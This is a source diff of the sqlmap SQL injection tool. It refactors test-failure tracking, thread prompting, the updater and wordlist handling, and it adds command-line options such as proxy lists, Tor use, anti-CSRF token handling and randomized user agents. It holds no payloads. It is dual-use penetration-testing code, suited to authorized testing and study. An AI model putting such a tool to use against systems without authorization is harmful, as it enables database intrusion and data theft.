errMsg = "something went wrong while trying "
|
errMsg = "something went wrong while trying "
|
||||||
|
@ -555,11 +683,15 @@ def initTargetEnv():
|
||||||
class _(unicode):
|
class _(unicode):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
original = conf.data
|
for key, value in conf.httpHeaders:
|
||||||
conf.data = _(urldecode(conf.data))
|
if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():
|
||||||
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
|
kb.postUrlEncode = "urlencoded" in value
|
||||||
|
break
|
||||||
kb.postSpaceToPlus = '+' in original
|
if kb.postUrlEncode:
|
||||||
|
original = conf.data
|
||||||
|
conf.data = _(urldecode(conf.data))
|
||||||
|
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
|
||||||
|
kb.postSpaceToPlus = '+' in original
|
||||||
|
|
||||||
def setupTargetEnv():
|
def setupTargetEnv():
|
||||||
_createTargetDirs()
|
_createTargetDirs()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -35,9 +35,10 @@ from lib.core.optiondict import optDict
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
from lib.parse.cmdline import cmdLineParser
|
from lib.parse.cmdline import cmdLineParser
|
||||||
|
|
||||||
failedItem = None
|
class Failures(object):
|
||||||
failedParseOn = None
|
failedItems = None
|
||||||
failedTraceBack = None
|
failedParseOn = None
|
||||||
|
failedTraceBack = None
|
||||||
|
|
||||||
def smokeTest():
|
def smokeTest():
|
||||||
"""
|
"""
|
||||||
|
@ -110,10 +111,6 @@ def liveTest():
|
||||||
Runs the test of a program against the live testing environment
|
Runs the test of a program against the live testing environment
|
||||||
"""
|
"""
|
||||||
|
|
||||||
global failedItem
|
|
||||||
global failedParseOn
|
|
||||||
global failedTraceBack
|
|
||||||
|
|
||||||
retVal = True
|
retVal = True
|
||||||
count = 0
|
count = 0
|
||||||
global_ = {}
|
global_ = {}
|
||||||
|
@ -192,13 +189,13 @@ def liveTest():
|
||||||
logger.info("test passed")
|
logger.info("test passed")
|
||||||
cleanCase()
|
cleanCase()
|
||||||
else:
|
else:
|
||||||
errMsg = "test failed "
|
errMsg = "test failed"
|
||||||
|
|
||||||
if failedItem:
|
if Failures.failedItems:
|
||||||
errMsg += "at parsing item \"%s\" " % failedItem
|
errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems)
|
||||||
|
|
||||||
errMsg += "- scan folder: %s " % paths.SQLMAP_OUTPUT_PATH
|
errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
|
||||||
errMsg += "- traceback: %s" % bool(failedTraceBack)
|
errMsg += " - traceback: %s" % bool(Failures.failedTraceBack)
|
||||||
|
|
||||||
if not vulnerable:
|
if not vulnerable:
|
||||||
errMsg += " - SQL injection not detected"
|
errMsg += " - SQL injection not detected"
|
||||||
|
@ -206,14 +203,14 @@ def liveTest():
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
test_case_fd.write("%s\n" % errMsg)
|
test_case_fd.write("%s\n" % errMsg)
|
||||||
|
|
||||||
if failedParseOn:
|
if Failures.failedParseOn:
|
||||||
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
||||||
console_output_fd.write(failedParseOn)
|
console_output_fd.write(Failures.failedParseOn)
|
||||||
console_output_fd.close()
|
console_output_fd.close()
|
||||||
|
|
||||||
if failedTraceBack:
|
if Failures.failedTraceBack:
|
||||||
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
|
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
|
||||||
traceback_fd.write(failedTraceBack)
|
traceback_fd.write(Failures.failedTraceBack)
|
||||||
traceback_fd.close()
|
traceback_fd.close()
|
||||||
|
|
||||||
beep()
|
beep()
|
||||||
|
@ -234,13 +231,9 @@ def liveTest():
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def initCase(switches, count):
|
def initCase(switches, count):
|
||||||
global failedItem
|
Failures.failedItems = []
|
||||||
global failedParseOn
|
Failures.failedParseOn = None
|
||||||
global failedTraceBack
|
Failures.failedTraceBack = None
|
||||||
|
|
||||||
failedItem = None
|
|
||||||
failedParseOn = None
|
|
||||||
failedTraceBack = None
|
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count)
|
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count)
|
||||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||||
|
@ -264,10 +257,6 @@ def cleanCase():
|
||||||
shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True)
|
shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True)
|
||||||
|
|
||||||
def runCase(parse):
|
def runCase(parse):
|
||||||
global failedItem
|
|
||||||
global failedParseOn
|
|
||||||
global failedTraceBack
|
|
||||||
|
|
||||||
retVal = True
|
retVal = True
|
||||||
handled_exception = None
|
handled_exception = None
|
||||||
unhandled_exception = None
|
unhandled_exception = None
|
||||||
|
@ -288,15 +277,15 @@ def runCase(parse):
|
||||||
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
|
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
|
||||||
|
|
||||||
if unhandled_exception:
|
if unhandled_exception:
|
||||||
failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
|
Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
|
||||||
retVal = None
|
retVal = None
|
||||||
elif handled_exception:
|
elif handled_exception:
|
||||||
failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
|
Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
|
||||||
retVal = None
|
retVal = None
|
||||||
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
||||||
retVal = False
|
retVal = False
|
||||||
|
|
||||||
console = getUnicode(console, system=True)
|
console = getUnicode(console, encoding=sys.stdin.encoding)
|
||||||
|
|
||||||
if parse and retVal:
|
if parse and retVal:
|
||||||
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
||||||
|
@ -308,19 +297,17 @@ def runCase(parse):
|
||||||
if item.startswith("r'") and item.endswith("'"):
|
if item.startswith("r'") and item.endswith("'"):
|
||||||
if not re.search(item[2:-1], parse_on, re.DOTALL):
|
if not re.search(item[2:-1], parse_on, re.DOTALL):
|
||||||
retVal = None
|
retVal = None
|
||||||
failedItem = item
|
Failures.failedItems.append(item)
|
||||||
break
|
|
||||||
|
|
||||||
elif item not in parse_on:
|
elif item not in parse_on:
|
||||||
retVal = None
|
retVal = None
|
||||||
failedItem = item
|
Failures.failedItems.append(item)
|
||||||
break
|
|
||||||
|
|
||||||
if failedItem is not None:
|
if Failures.failedItems:
|
||||||
failedParseOn = console
|
Failures.failedParseOn = console
|
||||||
|
|
||||||
elif retVal is False:
|
elif retVal is False:
|
||||||
failedParseOn = console
|
Failures.failedParseOn = console
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -106,20 +106,25 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
||||||
kb.threadContinue = True
|
kb.threadContinue = True
|
||||||
kb.threadException = False
|
kb.threadException = False
|
||||||
|
|
||||||
if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
|
if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
|
||||||
while True:
|
while True:
|
||||||
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
||||||
choice = readInput(message, default=str(numThreads))
|
choice = readInput(message, default=str(numThreads))
|
||||||
if choice and choice.isdigit():
|
if choice:
|
||||||
if int(choice) > MAX_NUMBER_OF_THREADS:
|
skipThreadCheck = False
|
||||||
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
if choice.endswith('!'):
|
||||||
logger.critical(errMsg)
|
choice = choice[:-1]
|
||||||
else:
|
skipThreadCheck = True
|
||||||
numThreads = int(choice)
|
if choice.isdigit():
|
||||||
break
|
if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
|
||||||
|
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
||||||
|
logger.critical(errMsg)
|
||||||
|
else:
|
||||||
|
conf.threads = numThreads = int(choice)
|
||||||
|
break
|
||||||
|
|
||||||
if numThreads == 1:
|
if numThreads == 1:
|
||||||
warnMsg = "running in a single-thread mode. This could take a while."
|
warnMsg = "running in a single-thread mode. This could take a while"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -140,7 +145,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
||||||
try:
|
try:
|
||||||
thread.start()
|
thread.start()
|
||||||
except threadError, errMsg:
|
except threadError, errMsg:
|
||||||
errMsg = "error occured while starting new thread ('%s')" % errMsg
|
errMsg = "error occurred while starting new thread ('%s')" % errMsg
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
break
|
break
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -41,7 +41,7 @@ def update():
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
||||||
process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
|
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
|
||||||
pollProcess(process, True)
|
pollProcess(process, True)
|
||||||
stdout, stderr = process.communicate()
|
stdout, stderr = process.communicate()
|
||||||
success = not process.returncode
|
success = not process.returncode
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,6 +9,7 @@ import os
|
||||||
import zipfile
|
import zipfile
|
||||||
|
|
||||||
from lib.core.exception import SqlmapDataException
|
from lib.core.exception import SqlmapDataException
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
class Wordlist(object):
|
class Wordlist(object):
|
||||||
|
@ -21,6 +22,7 @@ class Wordlist(object):
|
||||||
self.fp = None
|
self.fp = None
|
||||||
self.index = 0
|
self.index = 0
|
||||||
self.counter = -1
|
self.counter = -1
|
||||||
|
self.current = None
|
||||||
self.iter = None
|
self.iter = None
|
||||||
self.custom = custom or []
|
self.custom = custom or []
|
||||||
self.proc_id = proc_id
|
self.proc_id = proc_id
|
||||||
|
@ -37,15 +39,15 @@ class Wordlist(object):
|
||||||
elif self.index == len(self.filenames):
|
elif self.index == len(self.filenames):
|
||||||
self.iter = iter(self.custom)
|
self.iter = iter(self.custom)
|
||||||
else:
|
else:
|
||||||
current = self.filenames[self.index]
|
self.current = self.filenames[self.index]
|
||||||
if os.path.splitext(current)[1].lower() == ".zip":
|
if os.path.splitext(self.current)[1].lower() == ".zip":
|
||||||
_ = zipfile.ZipFile(current, 'r')
|
_ = zipfile.ZipFile(self.current, 'r')
|
||||||
if len(_.namelist()) == 0:
|
if len(_.namelist()) == 0:
|
||||||
errMsg = "no file(s) inside '%s'" % current
|
errMsg = "no file(s) inside '%s'" % self.current
|
||||||
raise SqlmapDataException(errMsg)
|
raise SqlmapDataException(errMsg)
|
||||||
self.fp = _.open(_.namelist()[0])
|
self.fp = _.open(_.namelist()[0])
|
||||||
else:
|
else:
|
||||||
self.fp = open(current, 'r')
|
self.fp = open(self.current, 'r')
|
||||||
self.iter = iter(self.fp)
|
self.iter = iter(self.fp)
|
||||||
|
|
||||||
self.index += 1
|
self.index += 1
|
||||||
|
@ -61,6 +63,11 @@ class Wordlist(object):
|
||||||
self.counter += 1
|
self.counter += 1
|
||||||
try:
|
try:
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = self.iter.next().rstrip()
|
||||||
|
except zipfile.error, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
except StopIteration:
|
except StopIteration:
|
||||||
self.adjust()
|
self.adjust()
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = self.iter.next().rstrip()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,7 +9,6 @@ import re
|
||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.common import sanitizeStr
|
from lib.core.common import sanitizeStr
|
||||||
|
@ -63,7 +62,7 @@ class MSSQLBannerHandler(ContentHandler):
|
||||||
def endElement(self, name):
|
def endElement(self, name):
|
||||||
if name == "signature":
|
if name == "signature":
|
||||||
for version in (self._version, self._versionAlt):
|
for version in (self._version, self._versionAlt):
|
||||||
if version and re.search(r" %s[\.\ ]+" % version, self._banner):
|
if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
|
||||||
self._feedInfo("dbmsRelease", self._release)
|
self._feedInfo("dbmsRelease", self._release)
|
||||||
self._feedInfo("dbmsVersion", self._version)
|
self._feedInfo("dbmsVersion", self._version)
|
||||||
self._feedInfo("dbmsServicePack", self._servicePack)
|
self._feedInfo("dbmsServicePack", self._servicePack)
|
||||||
|
@ -104,8 +103,6 @@ def bannerParser(banner):
|
||||||
if not xmlfile:
|
if not xmlfile:
|
||||||
return
|
return
|
||||||
|
|
||||||
checkFile(xmlfile)
|
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL):
|
if Backend.isDbms(DBMS.MSSQL):
|
||||||
handler = MSSQLBannerHandler(banner, kb.bannerFp)
|
handler = MSSQLBannerHandler(banner, kb.bannerFp)
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
|
|
|
@ -1,10 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import shlex
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
|
@ -13,23 +16,37 @@ from optparse import OptionParser
|
||||||
from optparse import SUPPRESS_HELP
|
from optparse import SUPPRESS_HELP
|
||||||
|
|
||||||
from lib.core.common import checkDeprecatedOptions
|
from lib.core.common import checkDeprecatedOptions
|
||||||
|
from lib.core.common import checkSystemEncoding
|
||||||
from lib.core.common import expandMnemonics
|
from lib.core.common import expandMnemonics
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.data import cmdLineOptions
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.defaults import defaults
|
from lib.core.defaults import defaults
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
|
from lib.core.exception import SqlmapShellQuitException
|
||||||
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.core.settings import BASIC_HELP_ITEMS
|
from lib.core.settings import BASIC_HELP_ITEMS
|
||||||
from lib.core.settings import DUMMY_URL
|
from lib.core.settings import DUMMY_URL
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
||||||
from lib.core.settings import VERSION_STRING
|
from lib.core.settings import VERSION_STRING
|
||||||
|
from lib.core.shell import autoCompletion
|
||||||
|
from lib.core.shell import clearHistory
|
||||||
|
from lib.core.shell import loadHistory
|
||||||
|
from lib.core.shell import saveHistory
|
||||||
|
|
||||||
def cmdLineParser():
|
def cmdLineParser():
|
||||||
"""
|
"""
|
||||||
This function parses the command line parameters and arguments
|
This function parses the command line parameters and arguments
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
checkSystemEncoding()
|
||||||
|
|
||||||
|
_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||||
"\"%s\"" % sys.argv[0] if " " in sys.argv[0] else sys.argv[0])
|
"\"%s\"" % _ if " " in _ else _)
|
||||||
|
|
||||||
parser = OptionParser(usage=usage)
|
parser = OptionParser(usage=usage)
|
||||||
|
|
||||||
|
@ -47,18 +64,20 @@ def cmdLineParser():
|
||||||
|
|
||||||
# Target options
|
# Target options
|
||||||
target = OptionGroup(parser, "Target", "At least one of these "
|
target = OptionGroup(parser, "Target", "At least one of these "
|
||||||
"options has to be provided to set the target(s)")
|
"options has to be provided to define the target(s)")
|
||||||
|
|
||||||
target.add_option("-d", dest="direct", help="Direct "
|
target.add_option("-d", dest="direct", help="Connection string "
|
||||||
"connection to the database")
|
"for direct database connection")
|
||||||
|
|
||||||
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"www.target.com/vuln.php?id=1\")")
|
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")
|
||||||
|
|
||||||
target.add_option("-l", dest="logFile", help="Parse targets from Burp "
|
target.add_option("-l", dest="logFile", help="Parse target(s) from Burp "
|
||||||
"or WebScarab proxy logs")
|
"or WebScarab proxy log file")
|
||||||
|
|
||||||
target.add_option("-m", dest="bulkFile", help="Scan multiple targets enlisted "
|
target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file")
|
||||||
"in a given textual file ")
|
|
||||||
|
target.add_option("-m", dest="bulkFile", help="Scan multiple targets given "
|
||||||
|
"in a textual file ")
|
||||||
|
|
||||||
target.add_option("-r", dest="requestFile",
|
target.add_option("-r", dest="requestFile",
|
||||||
help="Load HTTP request from a file")
|
help="Load HTTP request from a file")
|
||||||
|
@ -73,14 +92,20 @@ def cmdLineParser():
|
||||||
request = OptionGroup(parser, "Request", "These options can be used "
|
request = OptionGroup(parser, "Request", "These options can be used "
|
||||||
"to specify how to connect to the target URL")
|
"to specify how to connect to the target URL")
|
||||||
|
|
||||||
|
request.add_option("--method", dest="method",
|
||||||
|
help="Force usage of given HTTP method (e.g. PUT)")
|
||||||
|
|
||||||
request.add_option("--data", dest="data",
|
request.add_option("--data", dest="data",
|
||||||
help="Data string to be sent through POST")
|
help="Data string to be sent through POST")
|
||||||
|
|
||||||
request.add_option("--param-del", dest="pDel",
|
request.add_option("--param-del", dest="paramDel",
|
||||||
help="Character used for splitting parameter values")
|
help="Character used for splitting parameter values")
|
||||||
|
|
||||||
request.add_option("--cookie", dest="cookie",
|
request.add_option("--cookie", dest="cookie",
|
||||||
help="HTTP Cookie header")
|
help="HTTP Cookie header value")
|
||||||
|
|
||||||
|
request.add_option("--cookie-del", dest="cookieDel",
|
||||||
|
help="Character used for splitting cookie values")
|
||||||
|
|
||||||
request.add_option("--load-cookies", dest="loadCookies",
|
request.add_option("--load-cookies", dest="loadCookies",
|
||||||
help="File containing cookies in Netscape/wget format")
|
help="File containing cookies in Netscape/wget format")
|
||||||
|
@ -90,42 +115,47 @@ def cmdLineParser():
|
||||||
help="Ignore Set-Cookie header from response")
|
help="Ignore Set-Cookie header from response")
|
||||||
|
|
||||||
request.add_option("--user-agent", dest="agent",
|
request.add_option("--user-agent", dest="agent",
|
||||||
help="HTTP User-Agent header")
|
help="HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--random-agent", dest="randomAgent",
|
request.add_option("--random-agent", dest="randomAgent",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use randomly selected HTTP User-Agent header")
|
help="Use randomly selected HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--host", dest="host",
|
request.add_option("--host", dest="host",
|
||||||
help="HTTP Host header")
|
help="HTTP Host header value")
|
||||||
|
|
||||||
request.add_option("--referer", dest="referer",
|
request.add_option("--referer", dest="referer",
|
||||||
help="HTTP Referer header")
|
help="HTTP Referer header value")
|
||||||
|
|
||||||
request.add_option("--headers", dest="headers",
|
request.add_option("--headers", dest="headers",
|
||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
request.add_option("--auth-type", dest="aType",
|
request.add_option("--auth-type", dest="authType",
|
||||||
help="HTTP authentication type "
|
help="HTTP authentication type "
|
||||||
"(Basic, Digest, NTLM or Cert)")
|
"(Basic, Digest, NTLM or PKI)")
|
||||||
|
|
||||||
request.add_option("--auth-cred", dest="aCred",
|
request.add_option("--auth-cred", dest="authCred",
|
||||||
help="HTTP authentication credentials "
|
help="HTTP authentication credentials "
|
||||||
"(name:password)")
|
"(name:password)")
|
||||||
|
|
||||||
request.add_option("--auth-cert", dest="aCert",
|
request.add_option("--auth-private", dest="authPrivate",
|
||||||
help="HTTP authentication certificate ("
|
help="HTTP authentication PEM private key file")
|
||||||
"key_file,cert_file)")
|
|
||||||
|
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||||
|
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a HTTP proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
request.add_option("--proxy-cred", dest="pCred",
|
request.add_option("--proxy-cred", dest="proxyCred",
|
||||||
help="HTTP proxy authentication credentials "
|
help="Proxy authentication credentials "
|
||||||
"(name:password)")
|
"(name:password)")
|
||||||
|
|
||||||
|
request.add_option("--proxy-file", dest="proxyFile",
|
||||||
|
help="Load proxy list from a file")
|
||||||
|
|
||||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||||
help="Ignore system default HTTP proxy")
|
help="Ignore system default proxy settings")
|
||||||
|
|
||||||
request.add_option("--tor", dest="tor",
|
request.add_option("--tor", dest="tor",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -155,23 +185,35 @@ def cmdLineParser():
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
|
|
||||||
request.add_option("--safe-url", dest="safUrl",
|
request.add_option("--safe-url", dest="safeUrl",
|
||||||
help="URL address to visit frequently during testing")
|
help="URL address to visit frequently during testing")
|
||||||
|
|
||||||
request.add_option("--safe-freq", dest="saFreq", type="int",
|
request.add_option("--safe-post", dest="safePost",
|
||||||
|
help="POST data to send to a safe URL")
|
||||||
|
|
||||||
|
request.add_option("--safe-req", dest="safeReqFile",
|
||||||
|
help="Load safe HTTP request from a file")
|
||||||
|
|
||||||
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
|
help="Parameter used to hold anti-CSRF token")
|
||||||
|
|
||||||
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
|
help="URL address to visit to extract anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use HTTP parameter pollution")
|
help="Use HTTP parameter pollution method")
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
@ -210,6 +252,9 @@ def cmdLineParser():
|
||||||
injection.add_option("--skip", dest="skip",
|
injection.add_option("--skip", dest="skip",
|
||||||
help="Skip testing for given parameter(s)")
|
help="Skip testing for given parameter(s)")
|
||||||
|
|
||||||
|
injection.add_option("--skip-static", dest="skipStatic", action="store_true",
|
||||||
|
help="Skip testing parameters that not appear dynamic")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to this value")
|
||||||
|
